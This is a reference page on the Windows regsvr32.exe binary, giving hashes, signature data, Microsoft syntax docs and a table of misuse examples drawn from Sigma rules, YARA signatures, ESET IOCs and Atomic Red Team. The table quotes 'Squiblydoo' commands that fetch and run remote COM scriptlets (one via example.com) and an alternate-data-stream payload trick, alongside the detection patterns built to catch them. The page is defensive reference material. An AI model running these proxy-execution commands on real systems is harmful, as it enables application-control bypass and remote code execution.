regsvr32.exe

  • File Path: C:\Windows\SysWOW64\regsvr32.exe
  • Description: Microsoft(C) Register Server

Screenshot

regsvr32.exe regsvr32.exe

Hashes

Type Hash
MD5 4D97D6FC07642D4F744C8C59DB674302
SHA1 CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0
SHA256 E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9
SHA384 31DD74D86D9A47B906E0C2AA1CA595F2F41C21A993520B8468F9C73713EEEA214EAB24AA72DA7665BCE9CFC132F17447
SHA512 0A4D3C22056FF19F37DCF9A0443B07D1D8F74BA4FF8A2795103F4D78E54D2F9A935117B0F193F93FB760E7437771BBFA9DDAFA5F68DBFED10A7CB42C50CB79D0
SSDEEP 384:wte9jI+ixZu70NgDGLQQgykkskgSQlUPxAOWrnLHW0uv:k8exZYXS4UPSLXs
IMP 99BBF1337F3DA5CFAB67854DF4ADE1D8
PESHA1 5DBB559ACDB6630C1A32551482E963483DBFFD88
PE256 D5AB93A0D8A06BC8F2DA1068053233AD5FA69D1D0BECF1CD222ADED924D23873

Runtime Data

Window Title:

RegSvr32

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(R-D) C:\Windows\System32\en-US\regsvr32.exe.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_261b62a767ca4e6d File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\regsvr32.exe

Signature

  • Status: Signature verified.
  • Serial: 33000001C422B2F79B793DACB20000000001C4
  • Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: REGSVR32.EXE
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/70
  • VirusTotal Link: https://www.virustotal.com/gui/file/e0e722a00c127e0425d2078e738b7a684c9f55a9bf521c67e9a40d796c8be0e9/detection/

File Similarity (ssdeep match)

File Score
C:\Windows\system32\regsvr32.exe 33

Possible Misuse

The following table contains possible examples of regsvr32.exe being misused. While regsvr32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\regsvr32.exe' DRL 1.0
sigma edr_command_execution_by_office_applications.yml description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\regsvr32.exe' DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml title: Regsvr32 Network Activity DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml description: Detects network connections and DNS queries initiated by Regsvr32.exe DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ DRL 1.0
sigma dns_query_win_regsvr32_network_activity.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma file_event_win_creation_system_file.yml - '\regsvr32.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'regsvr32' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\regsvr32.exe' triggered by installing common software DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml title: Regsvr32 Network Activity DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml description: Detects network connections and DNS queries initiated by Regsvr32.exe DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ DRL 1.0
sigma net_connection_win_regsvr32_network_activity.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_apt_bluemashroom.yml - '\regsvr32' DRL 1.0
sigma proc_creation_win_apt_evilnum_jul20.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml CommandLine\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_malware_qbot.yml - 'regsvr32.exe' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_monitoring_for_persistence_via_bits.yml CommandLine\|re: '(?i).*bitsadmin.*\/SetNotifyCmdLine.*(%COMSPEC%\|cmd.exe\|regsvr32.exe).*' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_office_applications_spawning_wmi_commandline.yml description: Initial execution of malicious document calls wmic to execute the file with regsvr32 DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml title: Excel Proxy Executing Regsvr32 With Payload DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'regsvr32' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml title: Excel Proxy Executing Regsvr32 With Payload DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*regsvr32*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_office_spawning_wmi_commandline.yml description: Initial execution of malicious document calls wmic to execute the file with regsvr32 DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_possible_applocker_bypass.yml # - '\regsvr32.exe' # too many FPs, very noisy DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'regsvr32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'regsvr32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml title: Regsvr32 Anomaly DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml description: Detects various anomalies in relation to regsvr32.exe DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml CommandLine\|contains: '..\..\..\Windows\System32\regsvr32.exe ' DRL 1.0
sigma proc_creation_win_susp_regsvr32_flags_anomaly.yml title: Regsvr32 Flags Anomaly DRL 1.0
sigma proc_creation_win_susp_regsvr32_flags_anomaly.yml description: Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time DRL 1.0
sigma proc_creation_win_susp_regsvr32_flags_anomaly.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_http_pattern.yml title: Suspicious Regsvr32 HTTP IP Pattern DRL 1.0
sigma proc_creation_win_susp_regsvr32_http_pattern.yml description: Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN DRL 1.0
sigma proc_creation_win_susp_regsvr32_image.yml title: Suspicious Regsvr32 Execution With Image Extension DRL 1.0
sigma proc_creation_win_susp_regsvr32_image.yml description: utilizes REGSVR32.exe to execute this DLL masquerading as a Image file DRL 1.0
sigma proc_creation_win_susp_regsvr32_image.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_no_dll.yml title: Regsvr32 Command Line Without DLL DRL 1.0
sigma proc_creation_win_susp_regsvr32_no_dll.yml Image\|endswith: '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\regsvr32.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\regsvr32.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentversion.yml Image: 'C:\Windows\system32\regsvr32.exe' DRL 1.0
sigma registry_event_office_vsto_persistence.yml - '\regsvr32.exe' # e.g. default Evernote installation DRL 1.0
LOLBAS Cmd.yml - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat  
LOLBAS Regsvr32.yml Name: Regsvr32.exe  
LOLBAS Regsvr32.yml - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll  
LOLBAS Regsvr32.yml - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll  
LOLBAS Regsvr32.yml - Path: C:\Windows\System32\regsvr32.exe  
LOLBAS Regsvr32.yml - Path: C:\Windows\SysWOW64\regsvr32.exe  
LOLBAS Regsvr32.yml - IOC: regsvr32.exe retrieving files from Internet  
LOLBAS Regsvr32.yml - IOC: regsvr32.exe executing scriptlet (sct) files  
LOLBAS Regsvr32.yml - IOC: DotNet CLR libraries loaded into regsvr32.exe  
LOLBAS Regsvr32.yml - IOC: DotNet CLR Usage Log - regsvr32.exe.log  
LOLBAS Regsvr32.yml - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/  
malware-ioc nukesped_lazarus .REGSVR32.EXE``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc nukesped_lazarus .REGSVR32.exe``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "value": "Regsvr32 - T1117", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "tag_name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nDetection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)\n\nPlatforms: Windows\n\nData Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator\n\nRemote Support: No\n\nContributors: Casey Smith", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Regsvr32 - T1117\"", © ESET 2014-2018
malware-ioc oceanlotus \|T1117\|Regsvr32 © ESET 2014-2018
atomic-red-team problem_report.md e.g. Run regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll MIT License. © 2018 Red Canary
atomic-red-team index.md - T1218.010 Regsvr32 MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Regsvr32 local DLL execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Regsvr32 Registering Non DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.010 Regsvr32 MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Regsvr32 local COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Regsvr32 local DLL execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Regsvr32 Registering Non DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | | | Regsvr32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | | | Regsvr32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1218.003.md Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. MIT License. © 2018 Red Canary
atomic-red-team T1218.008.md Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md # T1218.010 - Regsvr32 MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md <blockquote>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a “Squiblydoo” attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #1 - Regsvr32 local COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #2 - Regsvr32 remote COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #3 - Regsvr32 local DLL execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #4 - Regsvr32 Registering Non DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md - Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #1 - Regsvr32 local COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1218.010\src\RegSvr32.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | regsvr32path | Default location of Regsvr32.exe | Path | C:\Windows\system32| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ##### Description: Regsvr32.sct must exist on disk at specified location (#{filename}) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Invoke-WebRequest “https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct” -OutFile “#{filename}” MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #3 - Regsvr32 local DLL execution MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md IF “%PROCESSOR_ARCHITECTURE%”==”AMD64” (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}#{regsvr32name} /s #{dll_name} ) MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #4 - Regsvr32 Registering Non DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md ## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md | regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| MIT License. © 2018 Red Canary
atomic-red-team T1220.md Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md regsvr32 /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md regsvr32 /u /S “C:\Program Files\Oracle\VirtualBox\VboxC.dll” MIT License. © 2018 Red Canary
signature-base apt_apt30_backspace.yar $s0 = “regsvr32 /s "%ProgramFiles%\Norton360\Engine\5.1.0.29\ashelper.dll"” fullword CC BY-NC 4.0
signature-base apt_codoso.yar $s1 = “regsvr32.exe /s "%s"” fullword ascii CC BY-NC 4.0
signature-base apt_leviathan.yar $x2 = “regsvr32 /s "%s" DR CIM” fullword wide CC BY-NC 4.0
signature-base apt_ta17_318A.yar $s1 = “REGSVR32.EXE.MUI” fullword wide CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x2 = “WriteLine(" (new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” ascii CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x4 = “sh.Run(‘regsvr32 /s /u /i:” ascii CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x5 = “.Get(‘Win32_ScheduledJob’).Create(‘regsvr32 /s /u /i:” ascii CC BY-NC 4.0
signature-base gen_cn_hacktool_scripts.yar $s0 = “regsvr32.exe /u C:\windows\system32\PacketX.dll” fullword ascii CC BY-NC 4.0
signature-base gen_cn_hacktool_scripts.yar $s1 = “regsvr32.exe C:\windows\system32\PacketX.dll” fullword ascii CC BY-NC 4.0
signature-base gen_mal_scripts.yar $x2 = “.Run(‘regsvr32 /s /u /i:” ascii CC BY-NC 4.0
signature-base gen_mal_scripts.yar $x3 = “new ActiveXObject(‘WScript.Shell’)).Run(‘regsvr32 /s” fullword ascii CC BY-NC 4.0
signature-base gen_recon_indicators.yar $s11 = “regsvr32 /s /u “ ascii CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0
signature-base thor-hacktools.yar $s1 = “exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, “ ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s3 = “oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s4 = “EchoB("regsvr32.exe exitcode = " & exitcode)” fullword ascii CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar Identifier: regsvr32 issue CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = “Detects a scriptlet file in the temporary Internet files (see regsvr32 AppLocker bypass)” CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


regsvr32

Registers .dll files as command components in the registry.

Syntax

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] <Dllname>

Parameters

Parameter Description
/u Unregisters server.
/s Prevents displaying messages.
/n Prevents calling DllRegisterServer. This parameter requires you to also use the /i parameter.
/i:<cmdline> Passes an optional command-line string (cmdline) to DllInstall. If you use this parameter with the /u parameter, it calls DllUninstall.
<Dllname> The name of the .dll file that will be registered.
/? Displays help at the command prompt.

Examples

To register the .dll for the Active Directory Schema, type:

regsvr32 schmmgmt.dll

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.